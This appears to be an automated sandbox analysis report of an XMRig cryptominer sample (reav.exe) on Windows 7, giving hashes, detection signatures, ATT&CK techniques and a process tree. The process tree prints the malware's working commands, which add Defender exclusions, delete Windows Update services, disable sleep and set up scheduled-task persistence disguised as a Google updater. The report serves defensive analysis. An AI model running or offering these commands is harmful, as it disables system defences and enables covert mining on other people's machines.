xmrig | 0423d0cb6564b1b11ac919f5c8d4de4d6cda4a694cdb9f62d2d44b6009bc506d

Analysis

max time kernel
301s
max time network
298s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-09-2022 06:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

reav.exe
Size

7.0MB
MD5

4c7bc4f742346f6f5506660175637a70
SHA1

b1c87e4395474abb15a1c6bf785bee77adfaefa5
SHA256

0423d0cb6564b1b11ac919f5c8d4de4d6cda4a694cdb9f62d2d44b6009bc506d
SHA512

fdb83490b218672b0ebf32d2e9168d89865efe0373468974d05ed3fe1ac1a22c986f0e75a746da4002db280d03376179805e92b2c2a8700a90c85238231a6b29
SSDEEP

196608:SIcrtGJOI5qLOKdTn8a9tcpAbe+wOlWd1wUgETPCO67:SIchGlepn8+Ag6wUhPx67

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

updater.exereav.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ reav.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	reav.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

reav.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts reav.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1728 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	reav.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
1728	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

reav.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	reav.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	reav.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1752 taskeng.exe

pid	process
1752	taskeng.exe

Themida packer 20 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1476-54-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-55-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-57-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-58-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-59-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-60-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-61-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
behavioral1/memory/1476-98-0x000000013F4D0000-0x00000001401B9000-memory.dmp	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1728-113-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-114-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-115-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-119-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-118-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-117-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-116-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-125-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
behavioral1/memory/1728-160-0x000000013FF50000-0x0000000140C39000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

reav.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	reav.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

reav.exeupdater.exe

pid process

1476 reav.exe
1728 updater.exe

pid	process
1476	reav.exe
1728	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 1728 set thread context of 1276	1728	updater.exe	conhost.exe
PID 1728 set thread context of 1932	1728	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

reav.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	reav.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

552 sc.exe
1508 sc.exe
912 sc.exe
2036 sc.exe
288 sc.exe
1692 sc.exe
1488 sc.exe
2036 sc.exe
2004 sc.exe
1468 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

336 schtasks.exe
2016 schtasks.exe

pid	process
552	sc.exe
1508	sc.exe
912	sc.exe
2036	sc.exe
288	sc.exe
1692	sc.exe
1488	sc.exe
2036	sc.exe
2004	sc.exe
1468	sc.exe

pid	process
336	schtasks.exe
2016	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d002082425cfd801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
604	powershell.exe
1816	powershell.exe
776	powershell.exe
1328	powershell.exe
896	powershell.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe
1932	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	604	powershell.exe
Token: SeShutdownPrivilege	1788	powercfg.exe
Token: SeShutdownPrivilege	1432	powercfg.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	2012	powercfg.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeShutdownPrivilege	1528	powercfg.exe
Token: SeShutdownPrivilege	308	powercfg.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeShutdownPrivilege	1280	powercfg.exe
Token: SeShutdownPrivilege	2032	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1840	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1840	WMIC.exe
Token: SeSecurityPrivilege	1840	WMIC.exe
Token: SeTakeOwnershipPrivilege	1840	WMIC.exe
Token: SeLoadDriverPrivilege	1840	WMIC.exe
Token: SeSystemtimePrivilege	1840	WMIC.exe
Token: SeBackupPrivilege	1840	WMIC.exe
Token: SeRestorePrivilege	1840	WMIC.exe
Token: SeShutdownPrivilege	1840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1840	WMIC.exe
Token: SeUndockPrivilege	1840	WMIC.exe
Token: SeManageVolumePrivilege	1840	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1840	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1840	WMIC.exe
Token: SeSecurityPrivilege	1840	WMIC.exe
Token: SeTakeOwnershipPrivilege	1840	WMIC.exe
Token: SeLoadDriverPrivilege	1840	WMIC.exe
Token: SeSystemtimePrivilege	1840	WMIC.exe
Token: SeBackupPrivilege	1840	WMIC.exe
Token: SeRestorePrivilege	1840	WMIC.exe
Token: SeShutdownPrivilege	1840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1840	WMIC.exe
Token: SeUndockPrivilege	1840	WMIC.exe
Token: SeManageVolumePrivilege	1840	WMIC.exe
Token: SeLockMemoryPrivilege	1932	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

reav.execmd.execmd.exepowershell.exepowershell.exetaskeng.exe

description	pid	process	target process
PID 1476 wrote to memory of 604	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 604	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 604	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 1100	1476	reav.exe	cmd.exe
PID 1476 wrote to memory of 1100	1476	reav.exe	cmd.exe
PID 1476 wrote to memory of 1100	1476	reav.exe	cmd.exe
PID 1476 wrote to memory of 1620	1476	reav.exe	cmd.exe
PID 1476 wrote to memory of 1620	1476	reav.exe	cmd.exe
PID 1476 wrote to memory of 1620	1476	reav.exe	cmd.exe
PID 1476 wrote to memory of 1816	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 1816	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 1816	1476	reav.exe	powershell.exe
PID 1620 wrote to memory of 1788	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 1788	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 1788	1620	cmd.exe	powercfg.exe
PID 1100 wrote to memory of 552	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 552	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 552	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 1508	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 1508	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 1508	1100	cmd.exe	sc.exe
PID 1620 wrote to memory of 1432	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 1432	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 1432	1620	cmd.exe	powercfg.exe
PID 1100 wrote to memory of 912	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 912	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 912	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 2036	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 2036	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 2036	1100	cmd.exe	sc.exe
PID 1620 wrote to memory of 1136	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 1136	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 1136	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 2012	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 2012	1620	cmd.exe	powercfg.exe
PID 1620 wrote to memory of 2012	1620	cmd.exe	powercfg.exe
PID 1100 wrote to memory of 288	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 288	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 288	1100	cmd.exe	sc.exe
PID 1100 wrote to memory of 1056	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1056	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1056	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 2004	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 2004	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 2004	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 952	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 952	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 952	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1724	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1724	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1724	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1468	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1468	1100	cmd.exe	reg.exe
PID 1100 wrote to memory of 1468	1100	cmd.exe	reg.exe
PID 1816 wrote to memory of 336	1816	powershell.exe	schtasks.exe
PID 1816 wrote to memory of 336	1816	powershell.exe	schtasks.exe
PID 1816 wrote to memory of 336	1816	powershell.exe	schtasks.exe
PID 1476 wrote to memory of 776	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 776	1476	reav.exe	powershell.exe
PID 1476 wrote to memory of 776	1476	reav.exe	powershell.exe
PID 776 wrote to memory of 856	776	powershell.exe	schtasks.exe
PID 776 wrote to memory of 856	776	powershell.exe	schtasks.exe
PID 776 wrote to memory of 856	776	powershell.exe	schtasks.exe
PID 1752 wrote to memory of 1728	1752	taskeng.exe	updater.exe

C:\Users\Admin\AppData\Local\Temp\reav.exe
"C:\Users\Admin\AppData\Local\Temp\reav.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:604

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:552

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1508

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:912

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2036

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:288

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1056

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2004

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:952

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1724

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1468

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#mlvtn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:776

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:856

C:\Windows\system32\taskeng.exe
taskeng.exe {3E707C90-E72A-4641-AA9B-F9FF3437E5D1} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1752

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:552

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:2036

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:2004

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1468

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1692

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1488

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
4⤵
PID:1560

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
4⤵
PID:1816

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:1796

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
4⤵
PID:1652

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
PID:1140

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:1616

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:308

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
4⤵
- Creates scheduled task(s)
PID:2016

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe hcrjlvsp
3⤵
PID:1276

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
4⤵
- Drops file in Program Files directory
PID:604

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:664

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe dmxihflldgatbxwx GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gdioqe8NBSKYuPqRQikB1LSNDCZ707F9ASg+mgAaJFy
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
8ae770bdb0a2d1babcc9642c82fd92a3

SHA1
2032658e2249a90f703dedffad238e9cb61c1278

SHA256
1626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4

SHA512
26317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
8ae770bdb0a2d1babcc9642c82fd92a3

SHA1
